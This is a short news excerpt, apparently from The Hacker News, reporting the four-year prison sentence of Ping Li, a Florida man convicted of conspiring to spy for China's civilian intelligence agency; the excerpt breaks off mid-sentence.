U.S. Citizen Sentenced for Spying on Behalf of China's Intelligence AgencyA 59-year-old U.S. citizen who immigrated from the People''s Republic of China (PRC) has been sentenced to four years in prison for conspiring to act as a spy for the country and sharing sensitive information about his employer with China''s principal civilian intelligence agency. Ping Li, 59, of Wesley Chapel, Florida, is said to have served as a cooperative contact for the Ministry of State
by The Hacker News